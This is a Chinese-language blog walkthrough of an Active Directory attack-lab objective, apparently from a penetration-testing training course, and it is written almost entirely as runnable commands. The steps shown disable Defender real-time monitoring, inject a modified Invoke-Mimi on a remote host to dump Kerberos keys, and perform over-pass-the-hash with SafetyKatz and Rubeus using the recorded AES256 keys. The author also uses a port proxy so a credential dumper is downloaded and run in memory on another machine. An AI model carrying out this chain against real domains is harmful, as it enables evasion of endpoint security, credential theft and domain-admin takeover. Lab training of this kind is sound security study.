Objective 7

任务

  1. 确定目标域中存在域管理会话的计算机
  2. 入侵计算机并将权限提升至域管理员 – 使用对 dcorp-ci 的访问权限 – 使用派生的本地管理员

 

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

 

. C:\ad\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess

屏幕截图 2024-09-06 203756

winrs -r:dcorp-adminsrv cmd

 

枚举Applocker

https://learn.microsoft.com/zh-cn/windows/security/application-security/application-control/windows-defender-application-control/applocker/what-is-applocker

https://www.g0dmode.biz/active-directory-enumeration/applocker-enumeration

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\

屏幕截图 2024-09-06 204000

 

放宽策略

reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\SrpV2\Exe\38a711c4-c0b8-46ee-98cf-c9636366548e

 

加入会话

Enter-PSSession dcorp-adminsrv

关闭防火墙

Set-MpPreference -DisableRealtimeMonitoring $true

 

在本地机器 修改Invoke-Mimi 添加函数 叫(Invoke-Mimi -Command ‘”sekurlsa::ekeys”‘) 并复制到目标

复制一份Invoke-Mimi

在末尾添加

Invoke-Mimi -Command '"sekurlsa::ekeys"'

屏幕截图 2024-09-06 205745

 

exit
Copy-Item C:\AD\Tools\Invoke-MimiEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'

 

Enter-PSSession dcorp-adminsrv
cd 'C:\Program Files\'
.\Invoke-MimiEx.ps1

成功运行我们写入的函数

屏幕截图 2024-09-06 210706

找到一些有用信息

屏幕截图 2024-09-06 210912

记录下来

srvadmin

145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4

 

在本地机器上使用提升的shell

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"

屏幕截图 2024-09-06 212411

弹出一个cmd窗口

 

使用该窗口

powershell
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -verbose

屏幕截图 2024-09-06 212703

 

因为srvadmin可以访问别的机器 将本地Loader.exe 复制到dcorp-mgmt

echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe

登录

winrs -r:dcorp-mgmt cmd

 

隧道本地的80端口

netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.32

屏幕截图 2024-09-06 213610

放入safetykatz

屏幕截图 2024-09-06 213914

 

使用SafetyKatz

C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit

屏幕截图 2024-09-06 214129

屏幕截图 2024-09-06 214226

 

屏幕截图 2024-09-06 214716

保存下来

svcadmin

6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011

C:\AD\Tools\Loader.exe -Path C:\AD\Tools\SafetyKatz.exe "sekurlsa::opassth /user:svcadmin /domain:dollarcorp.moneycorp.local /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:cmd.exe" "exit"
powershell
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -verbose

屏幕截图 2024-09-06 215141

 

或使用Rubeus.exe

C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:b607d794f87ca117a14353da0dbb6f27bbe9fed4f1ce1b810b43fbb9a2eab192 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

 

© 版权声明
THE END
喜欢就支持一下吧
点赞7 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片